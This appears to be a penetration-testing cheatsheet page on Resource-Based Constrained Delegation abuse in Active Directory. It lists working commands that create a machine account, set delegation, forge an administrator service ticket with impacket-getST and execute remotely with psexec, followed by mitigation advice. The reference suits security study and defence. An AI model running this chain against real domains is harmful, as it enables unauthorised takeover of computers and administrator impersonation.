Back to Active Directory

Rbcd

Active Directory cheatsheet — Active Directory enumeration and attack techniques.

Overview

Resource-Based Constrained Delegation (RBCD) abuse allows an attacker with GenericWrite/GenericAll over a computer object to configure msDS-AllowedToActOnBehalfOfOtherIdentity to permit delegation from a controlled account.

This enables the attacker to compromise the target computer by authenticating as any user (e.g., Domain Admin) via S4U2Proxy.

Category: Active Directory — Active Directory enumeration and attack techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Rbcd:

Set-DomainRBCD -Identity WIN10$ -DelegateFrom 'ATTACKER$'
$pass=ConvertTo-SecureString 'Password123!' -AsPlainText -Force; New-ADComputer -Name ATTACKER -AccountPassword $pass -Enabled $true
impacket-getST -spn cifs/win10.target.local -impersonate administrator -dc-ip 10.10.10.10 'target.local/ATTACKER$:Password123!'
impacket-psexec -k -no-pass target.local/administrator@win10.target.local

Tools & Techniques

Recommended tools for Rbcd:

  • PowerView: Set-DomainRBCD for delegation modification
  • Impacket getST: request TGS with S4U2Proxy
  • Impacket psexec/smbexec: execute with ticket
  • Requires: GenericWrite on target computer object

Prevention & Mitigation

Security recommendations to prevent Rbcd:

  • Restrict who has GenericWrite/GenericAll on computer objects
  • Audit msDS-AllowedToActOnBehalfOfOtherIdentity modifications
  • Monitor for new computer accounts created by non-admin users
  • Use Group Policy to review computer delegation settings

References

Additional resources: